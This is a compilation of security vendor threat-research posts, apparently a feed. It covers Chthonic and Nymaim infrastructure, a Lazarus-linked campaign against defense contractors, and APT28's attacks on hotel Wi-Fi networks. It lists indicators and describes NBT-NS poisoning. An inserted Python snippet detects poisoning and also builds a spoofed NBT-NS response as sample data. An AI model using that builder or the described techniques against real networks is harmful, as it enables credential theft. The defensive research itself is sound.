43bfaf9a2a4d46695bb313a32d88586c510d040844f29852c755845a5a09d9df 2017-07-25 06
b41660db6dcb0d3c7b17f98eae3141924c8c0ee980501ce541b42dc766f85628 2017-07-25 06 C:mdbChangedContainerpraise.pdb
9acdad02ca8ded6043ab52b4a7fb2baac3a08c9f978ce9da2eb51c816a9e7a2e 2017-07-25 07
2ddaa30ba3c3e625e21eb7ce7b93671ad53326ef8b6e2bc20bc0d2de72a3929d 2017-07-25 20 C:helpersbetterExprEightDS.pdb
b836576877b2fcb3cacec370e5e6a029431f59d5070da89d94200619641ca0c4 2017-07-26 12 C:VregardviolatesupdateAMBWa.pdb
0972fc9602b00595e1022d9cfe7e9c9530d4e9adb5786fea830324b3f7ff4448 2017-07-26 20
2c258ac862d5e31d8921b64cfa7e5a9cd95cca5643c9d51db4c2fcbe75fa957a 2017-07-27 01 C:executableryconstructedIIc.pdb
dd9c558ba58ac81a2142ecb308ac8d0f044c7059a039d2e367024d953cd14a00 2017-07-27 02
cb3173a820ac392005de650bbd1dd24543a91e72d4d56300a7795e887a8323b2 2017-07-31 14 C:letterbxingEVPChiceslegit.pdb
a636f49814ea6603534f780b83a5d0388f5a5d0eb848901e1e1bf2d19dd84f05 2017-07-31 18 C:Biomusemoment705cnvincing.pdb
677dd11912a0f13311d025f88caabeeeb1bda27c7c1b5c78cffca36de46e8560 2017-07-31 21
fdedf0f90d42d3779b07951d1e8826c7015b3f3e724ab89e350c9608e1f23852 2017-08-01 21
142bf7f47bfbd592583fbcfa22a25462df13da46451b17bb984d50ade68a5b17 2017-08-02 09
6f4b2c95b1a0f320da1b1eaa918c338c0bab5cddabe169f12ee734243ed8bba8 2017-08-02 12 C:catalogingDrVarianceShadows11.pdb
fd5fd7058cf157ea249d4dcba71331f0041b7cf8fd635f37ad13aed1b06bebf2 2017-08-04 02 C:dumplingsThatBITWarezloc.pdb
5785c2d68d6f669b96c3f31065f0d9804d2ab1f333a90d225bd993e66656b7d9 2017-08-07 12 C:Lgisyshypothesizeddonatedc.pdb
675719a9366386034c285e99bf33a1a8bafc7644874b758f307d9a288e95bdbd 2017-08-07 17 C:workcrnatacppsevensevenreleaseseven.pdb

At least one of the binaries compiled in August had a PDB string I was able to locate online in a collection of other PDB files, so they may be introducing their malicious code into these files before compiling someone else’s project.

Once the file has been downloaded and executed, the new process will launch a legitimate executable, such as “msiexec.exe”, and inject code into it. This code will then download further payloads through a POST request to various websites. This pattern is shared across the original samples.


These HTTP requests match known patterns for a banking Trojan named Chthonic, which is a variant of Zeus. A good 2014 write-up on the malware by Yury Namestnikov, Vladimir Kuskov and Oleg Kupreev at Kaspersky Lab can be found here; it indicates that the returned data is an RC4-encrypted loader that sets up the main Chthonic module, which can download additional modules or malware.

A dab of Nymaim

Iterating once again over the 171 samples and scraping out the HTTP POST requests, I ended up with the below set of domains.


Using this as the next pivot, we have 6,034 unique samples that get returned in AutoFocus having made POST requests to these sites. Additionally, we can see there were at least 3 very large campaigns where Palo Alto Networks saw activity to these sites in July.

From these distribution sites, we can see that 5,520 samples are making HTTP requests to them and these samples have been identified as another downloader Trojan named Nymaim.

The majority of the overall samples came from the following four sites.


The ‘ejtmjealr[.]com’ domain is particularly interesting due to a similar domain, ‘ejdqzkd[.]com’, being discussed by Jarosław Jedynak of CERT.PL in this analysis of Nymaim from earlier in the year. They go on to discuss how Nymaim uses a static configuration to contact that domain, which returns IPs that go into a DGA and output the actual IP addresses needed for C2 communication. Ben Baker, Edmund Brumaghin and Jonah Samost of Talos have a fantastic write-up of this process here.

Raising the dead – Infrastructure Archeology

To continue my analysis, I shifted focus to Maltego so as to visually graph the infrastructure. For this task, I used PassiveTotal’s Passive DNS and AutoFocus Maltego transforms. We see below the passive resolutions for these domains and how it reveals a number of IP addresses being shared between the four domains identified above.


All of the 707 IP addresses can be found here. Note that while these IPs have been found to be hosting malicious content, this could change in the future.

Pivoting off the five highlighted IP’s above with a shared infrastructure, I pulled the reverse DNS to see what other sites may be present. The below is a sampling of the domains returned through this process.


The “idXXXXX.top” pattern immediately stands out and may suggest a pattern in the static configuration for the initial domains used by the DGA for Nymaim, since the previous two started with “ejX.com”.

Given the level of overlap already, I proceeded to grab all of the passive DNS available for each of the 707 IP addresses. A full list of the domains can be seen here. The below Maltego graph is used to simply illustrate the two distinct clusters of infrastructure that appeared and their interconnectedness.


From the first cluster on the left, if we sort by incoming links per node, a pattern stands out in the domain names, which look similar to the previously mentioned Nymaim ones. In the below image, the top domains are sorted by incoming links on the right side. Each link corresponds to an IP address, showing that these domains have been rotated quite a bit across the infrastructure.


A quick search with the AutoFocus transform to pull tag information shows these are specifically related to Nymaim, most likely for the DGA seed; however, looking at domains with fewer links, other malware families begin to emerge.

The cluster on the right is actually collapsing one collection of entities due to the sheer size of it. Below is the collection expanded in all of its glory.


Below are the domain names linked to the singular IP address in the center.


All of these connected domains follow a pattern similar to phishing attacks masquerading as legitimate services – in this case “online.verify[.]paypal” (588) and “hmrc.secure[.]refund” (1021).

In addition to domains of that type, there is evidence of other malware distribution being carried out on this infrastructure. Collapsing the collection back down, note the two domains “brontorittoozzo[.]com” and “randomessstioprottoy[.]net” that fall outside of the collection due to more infrastructure connections.


A quick search for these domains will land you on fellow Unit 42 researcher Brad Duncan’s malware-traffic-analysis (MTA) site, at the post “2017-06-22 – LOCKY MALSPAM – PDF ATTACHMENTS WITH EMBEDDED .DOCM FILES”, in which he lists the URLs found within malicious Microsoft Word documents that download Locky, as shown below.


In some of the other smaller clusters, you’ll find groupings of like malicious sites.

For example, there is a group with gems like “premarket[.]ws”, shown below, being hosted on this shared infrastructure; it is a forum for less than legal services.


Along with sites like “slilpp[.]ws” which is another less than reputable site as shown below.


Which ironically has a Twitter support account that specifically states the following.


And yet another, shown below…


There are 632 people happily following along with relatively easy to track down accounts and usernames. A substantial amount of these accounts, on quick review, appear to follow the typical Nigerian cybercrime patterns detailed in other blogs.

Finally, there were multiple clusters of domains used by the Hancitor malware dropper to host the initial check-in and tracking as shown here.


These domains can be seen to have been used in a campaign on July 03, 2017, via a post on MTA shown below.



By pivoting off of one sample, we were able to zoom out and identify a sizable infrastructure of what appears to be 707 IPs and 2,611 domains being utilized for malicious activity.

As such, these findings represent a collection of compromised websites, compromised registrar accounts used to spin up subdomains, domains used by malware DGAs, phishing kits, carding forums, malware C2 sites, and a slew of other domains that revolve around criminal activity.

Hopefully this analysis has been helpful in understanding how truly connected some of these infrastructures can be and how with a little digging, you can uncover a substantial amount of operationally useful indicators to protect you and yours.

AutoFocus users can identify and track these threats using the Chthonic, Nymaim, and NotepadInfrastructure tags.

The post The Curious Case of Notepad and Chthonic: Exposing a Malicious Infrastructure appeared first on Palo Alto Networks Blog.

Author: Jeff White

The Blockbuster Saga Continues

Unit 42 researchers at Palo Alto Networks have discovered new attack activity targeting individuals involved with United States defense contractors. Through analysis of malicious code, files, and infrastructure, it is clear the group behind this campaign is either directly responsible for or has cooperated with the group which conducted Operation Blockbuster Sequel and, ultimately, Operation Blockbuster (originally outlined by researchers from Novetta). The threat actors are reusing tools, techniques, and procedures which overlap throughout these operations with little variance. Attacks originating from this threat group have not ceased since our previous report (from April of 2017) and have continued through July of 2017.

New Activity

Recently, we’ve identified weaponized Microsoft Office Document files which use the same malicious macros as attacks from earlier this year. Based on the contents of these latest decoy documents, which are displayed to a victim after opening the weaponized document, the attackers have switched targets from Korean language speakers to English language speakers. Most notably, decoy document themes now include job role descriptions and internal policies from US defense contractors.

The following image shows the content of one of the recent decoy documents (de2d458c8e4befcd478a0010789d80997793790b18a347d10a595d6e87d91f34). It is a job description at a defense contractor.


The following image also shows the contents of a recent decoy document (062aadf3eb69686f4881860d88ce472e6b1c07e1f586d840dd2ee1f7b76cabe7). It contains an exact copy of a publicly available job description, including typos, at a US defense contractor.


The weaponized documents have been hosted on systems which we believe have likely been compromised and repurposed. Two of the URL paths used to host the weaponized documents on the compromised systems are exact matches (event/careers/jobs/description/docs). The payloads delivered by the weaponized documents are extremely similar to the payloads delivered by weaponized documents detailed in our April 2017 report on the threat group’s activity.

For a more comprehensive understanding of the relationships between samples and infrastructure used in the recent activity see the following network graph.


The document metadata Author “ISkyISea” is used across multiple weaponized document files. IPv4 addresses (210.202.40[.]35) hosting the weaponized documents have also been hardcoded as command and control servers for previous samples (16c3a7f143e831dd0481d2d57aae885090e22ec55cc8282009f641755d423fcd).

Ties to Blockbuster

The source code used in the macros embedded in the weaponized documents described above was also detailed in a previous report where it was included in testing documents uploaded to VirusTotal. This reuse of macro source code, XOR keys used within the macro to decode implant payloads, and the functional overlap in the payloads the macros write to disk demonstrates the continued use of this tool set by this threat group. The use of an automated tool to build the weaponized documents would explain the common but not consistent reuse of metadata, payloads, and XOR keys within the documents.

Other similarities between the previously reported activity and this new activity can be seen within the PE payloads written to disk by the malicious documents. The payloads function similarly to other implants associated with this threat group. The use of a fake TLS communications protocol, encoded strings within samples, filenames and contents of batch files embedded within implants, as well as implants beaconing directly to IPv4 addresses (and not resolving domains for command and control) are all known techniques associated with the threat group. These tactics have changed very little since the original Operation Blockbuster.

In addition to tool reuse, infrastructure overlaps also exist. URLs used for hosting the malicious documents and IPv4 addresses used for command and control overlap with infrastructure previously used by the group.

Final Thoughts

The techniques and tactics the group uses have changed little in recent attacks. Tool and infrastructure overlaps with previous campaigns are apparent. Given that the threat actors have continued operations despite their discovery and public exposure it is likely they will continue to operate and launch targeted campaigns.

Palo Alto Networks researchers will continue to monitor this group’s activities and stay abreast of additional attacks using this tool set.

  • The malicious files described in this report are flagged as malicious by WildFire and in Threat Prevention.
  • AutoFocus users can learn more about the threat group and their indicators by examining the BlockBuster_Sequel tag.

Indicators of Compromise

The post The Blockbuster Saga Continues appeared first on Palo Alto Networks Blog.

Author: Anthony Kasza

APT28 Targets Hospitality Sector, Presents Threat to Travelers

FireEye has moderate confidence that a campaign targeting the
hospitality sector is attributed to Russian actor APT28.
We believe this activity, which dates back to at least July 2017, was
intended to target travelers to hotels throughout Europe and the
Middle East. The actor has used several notable techniques in these
incidents such as sniffing passwords from Wi-Fi traffic, poisoning the
NetBIOS Name Service, and spreading laterally via the EternalBlue exploit.

APT28 Uses Malicious Document to Target Hospitality Industry

FireEye has uncovered a malicious document sent in spear phishing
emails to multiple companies in the hospitality industry, including
hotels in at least seven European countries and one Middle Eastern
country in early July. Successful execution of the macro within the
malicious document results in the installation of APT28’s signature GAMEFISH malware.

The malicious document – Hotel_Reservation_Form.doc (MD5:
9b10685b774a783eabfecdb6119a8aa3), as seen in Figure 1 – contains a
macro that base64 decodes a dropper that then deploys APT28’s
signature GAMEFISH malware (MD5: 1421419d1be31f1f9ea60e8ed87277db),
which uses mvband.net and mvtband.net as command and control (C2) domains.

Figure 1: Hotel_Reservation_Form.doc
(MD5: 9b10685b774a783eabfecdb6119a8aa3)

APT28 Uses Novel Techniques to Move Laterally and Potentially Target Travelers

APT28 is using novel techniques involving the EternalBlue exploit
and the open source tool Responder to spread
laterally through networks and likely target travelers. Once inside
the network of a hospitality company, APT28 sought out machines that
controlled both guest and internal Wi-Fi networks. No guest
credentials were observed being stolen at the compromised hotels;
however, in a separate incident that occurred in Fall 2016, APT28
gained initial access to a victim’s network via credentials likely
stolen from a hotel Wi-Fi network.

Upon gaining access to the machines connected to corporate and guest
Wi-Fi networks, APT28 deployed Responder. Responder facilitates
NetBIOS Name Service (NBT-NS) poisoning. This technique listens for
NBT-NS (UDP/137) broadcasts from victim computers attempting to
connect to network resources. Once received, Responder masquerades as
the sought-out resource and causes the victim computer to send the
username and hashed password to the attacker-controlled machine. APT28
used this technique to steal usernames and hashed passwords that
allowed escalation of privileges in the victim network.
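As an added example (not part of the FireEye report), the following Python decodes NBT-NS packets on UDP/137 per RFC 1002 and flags any host that answers a query for a canary name that exists on no legitimate machine, which is one way a defender can spot Responder-style poisoning on a segment; the canary name, transaction ID and host 192.168.1.77 are constructed sample values.

```python
import struct

NB_RTYPE = 0x0020  # NetBIOS general name service record type

def encode_nb_name(name: str, suffix: int = 0x00) -> bytes:
    """RFC 1001 first-level encoding: 15-char padded name + suffix byte, each nibble + 'A'."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    enc = bytes(b for c in raw for b in ((c >> 4) + 0x41, (c & 0xF) + 0x41))
    return b"\x20" + enc + b"\x00"

def decode_nb_name(buf: bytes, off: int):
    if buf[off] != 32:  # every first-level encoded name is one 32-byte label
        raise ValueError("not a first-level encoded NetBIOS name")
    enc = buf[off + 1:off + 33]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(), raw[15], off + 34  # name, suffix, next offset

def build_nb_response(tid: int, name: str, ip: str, ttl: int = 165) -> bytes:
    """Positive name-query response (constructed sample of what a poisoner sends)."""
    rdata = b"\x00\x00" + bytes(int(o) for o in ip.split("."))  # NB_FLAGS + IPv4
    rr = encode_nb_name(name) + struct.pack("!HHIH", NB_RTYPE, 1, ttl, len(rdata))
    return struct.pack("!HHHHHH", tid, 0x8500, 0, 1, 0, 0) + rr + rdata

def parse_nbns(pkt: bytes):
    """Return (is_response, [(answered_name, ipv4), ...]) for one UDP/137 payload."""
    _, flags, qd, an, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    off, answers = 12, []
    for _ in range(qd):  # question section: label + QTYPE + QCLASS
        off = decode_nb_name(pkt, off)[2] + 4
    for _ in range(an):
        name, _, off = decode_nb_name(pkt, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        rdata, off = pkt[off + 10:off + 10 + rdlen], off + 10 + rdlen
        if rtype == NB_RTYPE:  # RDATA holds one or more (NB_FLAGS, IPv4) entries
            for i in range(0, rdlen, 6):
                answers.append((name, ".".join(str(b) for b in rdata[i + 2:i + 6])))
    return bool(flags & 0x8000), answers

def detect_nbns_poisoning(packets, canary_names):
    """packets: (source_ip, UDP/137 payload) pairs; any answer for a canary name is a poisoner."""
    alerts = []
    for src, pkt in packets:
        is_response, answers = parse_nbns(pkt)
        for name, ip in answers:
            if is_response and name in canary_names:
                alerts.append(f"{src} answered canary {name} with {ip}")
    return alerts

# Constructed sample: hypothetical rogue host 192.168.1.77 answering a canary name.
SAMPLE = [("192.168.1.77", build_nb_response(0x1234, "CANARY-SHARE01", "192.168.1.77"))]
```

A real deployment would periodically broadcast a query for the canary name from a monitoring host and feed captured UDP/137 replies into detect_nbns_poisoning.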

To spread through the hospitality company’s network, APT28 used a
version of the EternalBlue SMB exploit. This was combined with the
heavy use of py2exe to compile Python scripts. This is the first time
we have seen APT28 incorporate this exploit into their intrusions.

In the 2016 incident, the victim was compromised after connecting to
a hotel Wi-Fi network. Twelve hours after the victim initially
connected to the publicly available Wi-Fi network, APT28 logged into
the machine with stolen credentials. These 12 hours could have been
used to crack a hashed password offline. After successfully accessing
the machine, the attacker deployed tools on the machine, spread
laterally through the victim’s network, and accessed the victim’s OWA
account. The login originated from a computer on the same subnet,
indicating that the attacker machine was physically close to the
victim and on the same Wi-Fi network.

We cannot confirm how the initial credentials were stolen in the
2016 incident; however, later in the intrusion, Responder was
deployed. Since this tool allows an attacker to sniff passwords from
network traffic, it could have been used on the hotel Wi-Fi network to
obtain a user’s credentials.

Long-Standing Threats to Travelers

Cyber espionage activity against the hospitality industry is
typically focused on collecting information on or from hotel guests of
interest rather than on the hotel industry itself, though actors may
also collect information on the hotel as a means of facilitating
operations. Business and government personnel who are traveling,
especially in a foreign country, often rely on systems to conduct
business other than those at their home office, and may be unfamiliar
with threats posed while abroad.

APT28 isn’t the only group targeting travelers. South Korea-nexus
Fallout Team (aka Darkhotel) has used spoofed software updates on
infected Wi-Fi networks in Asian hotels, and Duqu 2.0 malware has been
found on the networks of European hotels used by participants in the
Iranian nuclear negotiations. Additionally, open sources have reported
for several years that in Russia and China, high-profile hotel guests
may expect their hotel rooms to be accessed and their laptops and other
electronic devices accessed.

Outlook and Implications

These incidents show a novel infection vector being used by APT28.
The group is leveraging less secure hotel Wi-Fi networks to steal
credentials and a NetBIOS Name Service poisoning utility to escalate
privileges. APT28’s already wide-ranging capabilities and tactics are
continuing to grow and refine as the group expands its infection vectors.

Travelers must be aware of the threats posed when traveling –
especially to foreign countries – and take extra precautions to secure
their systems and data. Publicly accessible Wi-Fi networks present a
significant threat and should be avoided whenever possible.


Author: Lindsay Smith